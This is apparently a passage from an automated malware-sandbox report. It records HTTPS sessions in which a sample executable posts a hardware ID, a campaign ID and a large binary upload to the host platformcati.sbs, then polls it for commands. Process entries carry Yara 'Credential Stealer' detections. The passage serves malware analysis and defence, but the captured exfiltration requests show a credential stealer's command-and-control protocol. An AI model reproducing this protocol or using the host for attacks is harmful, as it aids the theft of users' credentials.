                                                                                      2025-01-27 13:54:45 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2025-01-27 13:54:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      6 | 192.168.2.7 | 49871 | 104.21.112.14 | 443 | 7392 | C:\Users\user\Desktop\h226x41CQ6.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2025-01-27 13:54:46 UTC | 372 | OUT | POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                      Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 553130
                                                                                      Host: platformcati.sbs
                                                                                      2025-01-27 13:54:46 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 42 32 35 33 31 42 43 38 39 41 39 34 34 41 33 30 30 35 46 32 30 35 37 44 32 43 37 44 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F5B2531BC89A944A3005F2057D2C7D6C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                      2025-01-27 13:54:46 UTC | 15331 | OUT | Data Raw: 0a be aa 59 28 0f 4a 0e 93 ab ba 85 c1 59 83 d5 3f 22 ef 10 f7 9f aa f2 16 d0 b3 03 11 fb 78 1e ae 8c d9 f5 78 7d b4 fd df 08 5b cd d5 62 5a 73 a0 d8 11 28 e9 da ed 29 35 9e b4 66 22 a5 e6 94 ac e6 10 2c d3 53 8a f8 04 de 4c 69 19 a6 f8 3c 66 91 9c c6 6d 09 74 95 67 73 1d f1 1c e2 9a fc f0 92 73 c1 2f db 87 d9 24 22 b5 03 45 11 d8 92 5e fb 16 0c 1b ec 2a 4c 8f 32 c2 c2 7e 0b d0 06 37 76 c9 44 41 b9 b6 5f 38 0f 24 2f 3b 2f 4d 7e 74 db f1 51 2c f9 42 53 e5 54 a9 5d 11 cc 3c 97 99 51 06 75 f2 a5 80 2b 0b fd de 2b d7 f9 cc 3d 4d a8 82 5b 07 37 6c 34 53 6a 3c 6a 63 e9 7e 72 a8 75 51 de 99 e1 f0 eb 80 16 4d ab 4e 5a d9 93 b4 73 64 cb b2 bc 65 37 ec 07 be 2a 59 10 72 0f 53 1e c4 09 56 b5 2b 83 68 01 cd 4f 3b 03 01 89 b1 c1 32 db df d5 28 ad 28 ca e2 e3 ea 15 65
                                                                                      Data Ascii: Y(JY?"xx}[bZs()5f",SLi<fmtgss/$"E^*L2~7vDA_8$/;/M~tQ,BST]<Qu++=M[7l4Sj<jc~ruQMNZsde7*YrSV+hO;2((e
                                                                                      2025-01-27 13:54:46 UTC | 15331 | OUT | Data Raw: 65 1e 14 37 25 41 3c c4 1c 67 2b 07 5d 91 b3 8b a7 78 5b 39 3b f4 5d 26 47 56 48 cf 17 23 40 f6 4e e6 a9 30 89 43 fd ad b7 1e 6f 13 0b 93 58 b7 7e 4c de 7d 0c 13 17 eb d7 cc 7b 5b 52 0a 2a 39 2f 99 6e 1f 5d eb 06 f1 ba d4 1f 6b 86 dc 73 03 f4 8b 3f 4c 09 ee 6e bc 2f ea 71 a5 5b 3d 4b bf 78 38 f9 2e bd 72 60 3b f7 c7 03 be 8f 0f 5a 97 77 2a 47 d7 fc 0a 9e 3e 7c 29 35 cc 79 ba fa f2 e9 cd 5f 6f 55 2f 37 af f6 d4 6d b2 57 6b b7 dd 5e c4 3f 54 9b 93 06 c3 de 03 05 5f 3f 5e 73 4c 4b 37 1c 8f 5c 9d b8 6f b5 ce 5c 8a 25 1b 92 b9 fd d8 44 82 d3 42 66 57 a9 a2 84 ff e7 58 9f 65 9a 6a 61 6c 8a 87 6c f2 a3 d5 03 b5 6e 19 55 0f 73 96 8c e8 e7 d0 bc 9a a0 87 49 28 5d 93 b9 9a b8 1f a1 b6 e1 bd f7 fe 7a 4c 3f 70 08 ae 0e 6c 71 d4 ee 09 f6 47 03 b7 cb de 11 b1 3e 74 69
                                                                                      Data Ascii: e7%A<g+]x[9;]&GVH#@N0CoX~L}{[R*9/n]ks?Ln/q[=Kx8.r`;Zw*G>|)5y_oU/7mWk^?T_?^sLK7\o\%DBfWXejallnUsI(]zL?plqG>ti
                                                                                      2025-01-27 13:54:46 UTC | 15331 | OUT | Data Raw: a3 7f 7e bc 71 d4 6e 38 7a 6a 23 f5 44 79 49 a2 1b 26 f4 3f 44 f6 2d 6d e2 c6 e8 60 56 0c 24 81 45 8f 18 56 29 86 dd 8a c8 06 36 e1 3c fe 8e e3 47 f3 7b c3 ec e2 34 9d 7c a5 6e 0b d6 f5 1c e4 0f 66 4b a9 56 69 3f df 27 6d d6 24 78 ae 33 2d 12 86 23 3c f9 50 9c ee df 42 be d8 e2 db 2c af 94 e6 2e 5f c9 7b 5f ae 61 16 9f aa 27 3c 20 6f af 61 17 b8 4a 7a a8 13 2a bb bd 38 30 21 fe bd e3 a7 8f ad 42 fa 6a 8d d0 15 31 75 a3 f4 34 41 d7 ef 06 ed 3f 3a 6f ce a6 e9 e2 8e 2a f6 b9 82 54 a9 dc 61 4f f5 de 39 a3 1d a3 a2 37 b7 e0 ce 17 1e 63 77 04 4f 3e 3b 0b fc e1 30 4f 9e 9f 55 59 42 8c 2e 79 a3 30 c3 d9 22 0d 08 92 38 5a 26 e7 0d 1d 5e 7c 0b d4 a1 e5 db 53 e5 c5 e9 b9 fd 76 e4 7e 17 7e 53 f7 a9 bc 8a 4b 0a 77 87 34 6e a7 9b 7d 24 e6 f2 2e 1f 8e c6 e5 6b 35 b8 fd
                                                                                      Data Ascii: ~qn8zj#DyI&?D-m`V$EV)6<G{4|nfKVi?'m$x3-#<PB,._{_a'< oaJz*80!Bj1u4A?:o*TaO97cwO>;0OUYB.y0"8Z&^|Sv~~SKw4n}$.k5
                                                                                      2025-01-27 13:54:46 UTC | 15331 | OUT | Data Raw: 88 95 06 29 45 4d fd cd 46 e5 eb 02 0c 83 ff 82 72 fc 9b 0b 0c 3f 34 bd 1b ea d1 96 38 3d b0 d9 1f 7a fb 20 3f 86 77 e3 88 ec f4 aa 65 1c 57 26 b5 d8 50 4c 8c 07 ec 54 c1 30 95 97 dd 0e 70 d4 0f 51 1d a6 88 e5 5a 4f f8 93 52 bf 3e da cc d8 ed 84 cf 8f cf 7f f0 55 91 6f fe c6 dc a7 86 7e 31 a1 9f 4a d1 41 0c 23 76 6c 0f 6e d6 8f f0 70 3e e1 81 71 b5 b1 07 ba a3 2b 2f 65 ce 45 21 6c 72 e3 ec c7 b4 6a 43 3d b9 84 26 c3 4b d3 55 4f e8 c9 68 73 f5 ec 87 fd dd 0b 2c 30 e1 f9 ab 44 4d 89 48 27 ae f2 f2 4c ac 15 7c 25 06 df 3a f7 34 c2 43 bf eb dd 4b 44 bb 51 6d 7f e3 36 fc 19 e3 ce b7 ba 76 32 bf ce 36 c4 2f 34 7d f6 7a 9b da 8b 9b 86 76 22 c4 57 0d f1 4d c7 92 d1 9e 85 14 f5 91 83 11 ea 59 f1 71 9f 25 47 a1 65 91 d5 43 b3 0d ae ea d7 38 d7 0f e1 5f 50 12 5c dc
                                                                                      Data Ascii: )EMFr?48=z ?weW&PLT0pQZOR>Uo~1JA#vlnp>q+/eE!lrjC=&KUOhs,0DMH'L|%:4CKDQm6v26/4}zv"WMYq%GeC8_P\
                                                                                      2025-01-27 13:54:46 UTC | 15331 | OUT | Data Raw: 46 74 db 74 ef c0 f5 03 a2 5e f7 9d 48 23 14 92 13 f3 f7 d6 1f 6f b4 81 4a df bf f5 52 51 e5 33 ed b7 39 33 27 8f 7e 13 61 0a 6d cf f3 cc 7d a5 07 a6 ff d2 2a 9f d9 6e d0 cc 23 78 be 42 b2 1b 26 60 3f c4 f8 30 d7 b5 f4 63 ee aa c4 c6 b5 99 a0 bc 3b dd 2e e7 87 3f e5 09 61 c1 fe f6 a9 5d 87 93 ef a1 4e fc 65 ae 05 12 be a3 b7 bd 7b 87 4b f4 86 73 dc 8d 18 8b 22 f2 ac 10 d8 5f 3f 35 9a 72 78 7b 25 12 1f fb 86 63 60 ed 37 53 c4 46 b5 b8 c2 ef a9 08 0a 19 f1 09 79 39 cc 70 6a 73 d9 a6 cf 67 bc a8 9f ee 94 9a 38 af 1f 79 4c 23 fe a3 11 62 dc b7 0b 66 5b 50 7c d1 3b 3a e4 c2 82 35 39 72 a8 c8 9b 3c 54 81 79 95 ae b3 7b cd e7 b3 58 92 a8 ea 5d f5 be 25 1c 15 10 c1 c4 f8 04 bd c6 83 c0 bc 79 c4 ca 36 0d d1 68 ed 3f e7 7d 30 b4 bd 14 b5 12 8b a2 6c ba db 87 17 63
                                                                                      Data Ascii: Ftt^H#oJRQ393'~am}*n#xB&`?0c;.?a]Ne{Ks"_?5rx{%c`7SFy9pjsg8yL#bf[P|;:59r<Ty{X]%y6h?}0lc
                                                                                      2025-01-27 13:54:46 UTC | 15331 | OUT | Data Raw: 46 3a a2 8f 01 13 2d 7c cd c8 7b 91 a1 5c a3 ab e4 50 d9 dd 65 dd c9 af 99 07 da 5a 59 85 a4 5b 47 e2 e7 2b 7e 86 18 14 68 ee 46 c3 71 48 3d d4 ba 08 53 04 6b 1e bf 52 7a f5 52 58 b7 78 36 39 a1 95 86 03 02 e5 08 ed 9b 2f 79 93 61 22 4c 00 a6 73 b3 86 93 d8 ad 90 e7 db 96 34 b7 21 78 86 ef 1c 09 6b 33 e5 b6 fc 5f 2e a1 ae c6 60 d2 5b b0 f1 4e f7 48 b4 36 ce 29 f2 92 04 e2 c6 48 b4 2e 22 a8 97 fa 6f 28 91 8c 6a 65 f7 5d df d7 ca 2e 7c 83 57 ab 40 88 cb 28 1b 0e ea 7b a5 22 6f 03 bf 32 44 3b 84 35 8f f4 ef fb ee 01 09 b5 60 5f db 16 a4 b5 b2 23 80 cc 72 e1 cd e4 07 18 a9 98 3e 6f 81 01 99 43 57 73 5e fd 25 41 d3 10 ef a1 be 7d b0 d9 2a 81 cf a6 3d 12 22 ce 6e 75 06 14 ef 6e d0 43 66 09 99 07 3d bb a6 a2 f3 ef 85 d7 8c 33 57 aa f9 38 45 22 c9 1b 17 e0 70 38
                                                                                      Data Ascii: F:-|{\PeZY[G+~hFqH=SkRzRXx69/ya"Ls4!xk3_.`[NH6)H."o(je].|W@({"o2D;5`_#r>oCWs^%A}*="nunCf=3W8E"p8
                                                                                      2025-01-27 13:54:46 UTC | 15331 | OUT | Data Raw: 36 06 6a 16 8b d8 e9 6c b1 0d e9 88 cf e3 25 a3 55 7a a1 ba 9c 79 bb bf 6c 0f 55 3f 48 e7 5e 45 27 fd cd 0d 48 e8 ef 1a ce bc a0 92 c2 02 6e 5f af c4 d5 22 e5 20 75 d6 c2 d1 d6 57 67 ca e6 17 1b 39 27 97 db 08 9a 6c 85 a5 c2 e1 f4 cd 6d 8b 08 4d 3e b3 76 b6 ec 8b 90 45 8d 50 8d 81 70 61 e6 f5 33 62 a2 63 ed d3 f4 04 f7 6b 42 1f 1a 9c 6f 39 f4 0a ed dc 39 0b fa 98 eb 2b ff 5b f2 20 2f 1f 7a ae ed 23 dd 5b 88 e8 bf 7d 7e 7e 9f 8d ea a5 f3 47 f8 b3 02 ec 66 d7 36 73 4f e2 7c 91 4a ad 02 e3 83 b4 0e 2c ea 64 a1 c0 d1 57 56 07 77 f1 ae 20 f5 04 85 a0 ca 63 14 75 54 4a 3e d0 0a e2 d1 a0 dd 32 f9 71 e6 28 b7 8c 07 28 86 ed d7 de 1b 9a bd 58 63 15 1c 19 03 e0 d4 87 5c f9 43 73 3e a2 05 58 ab 55 7b 80 fe bd 3a 64 27 0f c8 ca d0 c5 ea 1f 5d a6 a3 80 89 71 b3 0e 72
                                                                                      Data Ascii: 6jl%UzylU?H^E'Hn_" uWg9'lmM>vEPpa3bckBo99+[ /z#[}~~Gf6sO|J,dWVw cuTJ>2q((Xc\Cs>XU{:d']qr
                                                                                      2025-01-27 13:54:46 UTC | 15331 | OUT | Data Raw: d8 31 5f 90 c8 94 f4 03 a7 64 8f d6 9a 5b c0 15 81 6e f7 49 ea 3d a1 7b df c4 d4 54 b6 95 ef e6 5f e7 b9 ff 24 70 a7 a4 81 ea 7c 53 2c ba 45 29 3b 1a ff 80 6d 71 56 27 e9 8b 5a 50 5b 8d 84 80 cc 93 b3 76 9c e9 f1 ab 23 d0 df dc 23 72 ee 05 e0 5f 90 5e 52 81 71 0b 83 62 5a d5 5f 3f b7 a3 1f 0c 5f 01 3f 2e fd 5e 7d 66 76 d9 11 18 1d 83 25 43 e2 e9 bd 3b 87 0c 90 1c 74 64 e5 d4 ea a9 9f 0d 48 46 99 38 96 43 0b e8 bc 9a b2 d8 43 52 56 04 f6 b5 b9 0c fb d9 ea 37 b6 77 43 5a 6f 3c 51 e9 38 4a cf c0 35 e7 17 0f 76 fe 2a 52 38 01 55 af 7d f0 ba d9 ea 67 90 a9 23 3b 6d 23 bd e9 42 05 c5 2f 1a 13 a6 5d 22 14 9f 1f bc ad 41 5c 75 85 90 68 ed 6f fc 39 76 3d 9c b2 61 c3 53 31 c5 d2 e1 4b 92 bc b4 eb 45 2d bb f7 5a 8c 4c 66 11 dd 5c e9 23 e9 16 1f 73 d2 07 ab 7b df 3c
                                                                                      Data Ascii: 1_d[nI={T_$p|S,E);mqV'ZP[v##r_^RqbZ_?_?.^}fv%C;tdHF8CCRV7wCZo<Q8J5v*R8U}g#;m#B/]"A\uho9v=aS1KE-ZLf\#s{<
                                                                                      2025-01-27 13:54:46 UTC | 15331 | OUT | Data Raw: 18 f2 be 5f 20 5b 7c 3f 15 ee bf ec 51 95 6e 6d b5 0f f6 23 e1 9a 2e 72 f7 22 f5 09 84 de b0 49 a1 8d a8 e3 8e 5f bd 3e 61 32 ea 3b a9 a6 43 4d f2 b4 f1 50 e2 ec bc 4e 6f 44 9c 90 0b f6 a2 26 23 8e b5 73 30 e7 9a bb e8 1a c5 be e9 a8 32 b4 b9 c1 b3 35 e9 0b de d9 b3 a7 3d 6f 7e 9a 21 41 4a 59 ff d9 7e cf 7f d6 2f ff c6 ec 4b fe 70 8f 13 7f ae 31 ac d6 86 d1 c2 4b f5 b3 13 c5 8e 57 cd d0 98 fd 3c 0c 75 bd 3f c5 65 3d 6b f6 a5 df 1d 25 98 1a 30 f8 c0 77 e4 d9 9c 1f 71 95 48 9d d3 75 65 c3 9c ce 1a 4c 6f 53 25 e5 8b 41 1b 75 e1 96 59 cf 88 2d bf 32 84 9b 85 31 0b 74 49 11 0d b2 4d 11 4f 86 99 ee e8 15 77 c1 86 99 1d 5d e9 1f b4 e7 ff 91 5e f9 37 6c 8e 32 75 d5 ec b2 20 e8 f2 6b 34 d9 82 04 25 4a ec f6 67 9c 26 04 63 bb cf cd 6a 9f ce 85 88 90 be a9 2f 0a ee
                                                                                      Data Ascii: _ [|?Qnm#.r"I_>a2;CMPNoD&#s025=o~!AJY~/Kp1KW<u?e=k%0wqHueLoS%AuY-21tIMOw]^7l2u k4%Jg&cj/
                                                                                      2025-01-27 13:54:48 UTC | 1126 | IN | HTTP/1.1 200 OK
                                                                                      Date: Mon, 27 Jan 2025 13:54:48 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=pl8t9u8aba70kc9oa4eupku7cl; expires=Fri, 23 May 2025 07:41:26 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Br8ScuBvY2raRDhZ6Cy78wjLv36hBOrCw2TcaP6n%2F6DJbupHNsXgtCRwhFDpO0ucwzcwxWpxDCyARlqOllw0lQ3KYz0u6RJL50SGkmfz%2FZ2znETJ0ExsYi6jKhenMuHqDThh"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 90893c8ec853729f-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1996&rtt_var=998&sent=195&recv=575&lost=0&retrans=1&sent_bytes=4218&recv_bytes=555722&delivery_rate=365685&cwnd=178&unsent_bytes=0&cid=33d3e953e08fa385&ts=2493&x=0"


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      7 | 192.168.2.7 | 49892 | 104.21.112.14 | 443 | 7392 | C:\Users\user\Desktop\h226x41CQ6.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2025-01-27 13:54:48 UTC | 353 | OUT | POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 77
                                                                                      Host: platformcati.sbs
                                                                                      2025-01-27 13:54:48 UTC | 77 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 26 68 77 69 64 3d 46 35 42 32 35 33 31 42 43 38 39 41 39 34 34 41 33 30 30 35 46 32 30 35 37 44 32 43 37 44 36 43
                                                                                      Data Ascii: act=get_message&ver=4.0&lid=H8NgCl--&j=&hwid=F5B2531BC89A944A3005F2057D2C7D6C
                                                                                      2025-01-27 13:54:49 UTC | 1118 | IN | HTTP/1.1 200 OK
                                                                                      Date: Mon, 27 Jan 2025 13:54:49 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=elcvtb6emru6f1eo0apb06uvqt; expires=Fri, 23 May 2025 07:41:28 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MfFGOpqLy95rUKFDG%2FUd4v3DCg7urXLRUNCnIzXZ1V1tQL9cHQMXmCPm3NRnWLNzTJelZX5YrlAgFFPrYP7n4tM9XLMwUj75FiXcshlryjJCq099DKO9DaO4GrVLGaJif0Ev"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 90893ca0a9d743b3-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1567&rtt_var=597&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1066&delivery_rate=1819314&cwnd=212&unsent_bytes=0&cid=0c1e86b957bf630f&ts=813&x=0"
                                                                                      2025-01-27 13:54:49 UTC | 142 | IN | Data Raw: 38 38 0d 0a 32 52 42 53 6e 58 32 39 41 73 32 76 4f 32 53 34 53 74 31 69 6c 30 6f 4b 38 4c 59 70 42 2b 47 74 46 53 54 65 74 58 4c 6a 73 52 36 43 61 33 44 6f 58 34 63 67 70 64 74 50 46 4d 74 77 67 55 33 4c 5a 57 4f 45 78 56 74 69 6c 38 4a 35 55 61 72 63 48 59 33 63 66 37 35 2b 4a 2b 35 54 78 58 75 33 38 78 51 33 30 43 53 7a 42 50 4e 6b 62 34 6a 54 43 79 76 44 79 32 45 47 35 49 56 65 77 64 51 38 34 79 41 76 77 41 3d 3d 0d 0a
                                                                                      Data Ascii: 882RBSnX29As2vO2S4St1il0oK8LYpB+GtFSTetXLjsR6Ca3DoX4cgpdtPFMtwgU3LZWOExVtil8J5UarcHY3cf75+J+5TxXu38xQ30CSzBPNkb4jTCyvDy2EG5IVewdQ84yAvwA==
                                                                                      2025-01-27 13:54:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Target ID:0
                                                                                      Start time:08:54:11
                                                                                      Start date:27/01/2025
                                                                                      Path:C:\Users\user\Desktop\h226x41CQ6.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\h226x41CQ6.exe"
                                                                                      Imagebase:0xe70000
                                                                                      File size:491'048 bytes
                                                                                      MD5 hash:FC8506934F3F379AF5F36CDCCB0C17CA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:08:54:11
                                                                                      Start date:27/01/2025
                                                                                      Path:C:\Users\user\Desktop\h226x41CQ6.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\h226x41CQ6.exe"
                                                                                      Imagebase:0xe70000
                                                                                      File size:491'048 bytes
                                                                                      MD5 hash:FC8506934F3F379AF5F36CDCCB0C17CA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1559487979.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1557986513.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1543311993.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1528754817.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1530149419.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1559608097.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:10
                                                                                      Start time:08:54:12
                                                                                      Start date:27/01/2025
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7260 -s 260
                                                                                      Imagebase:0x5c0000
                                                                                      File size:483'680 bytes
                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      No disassembly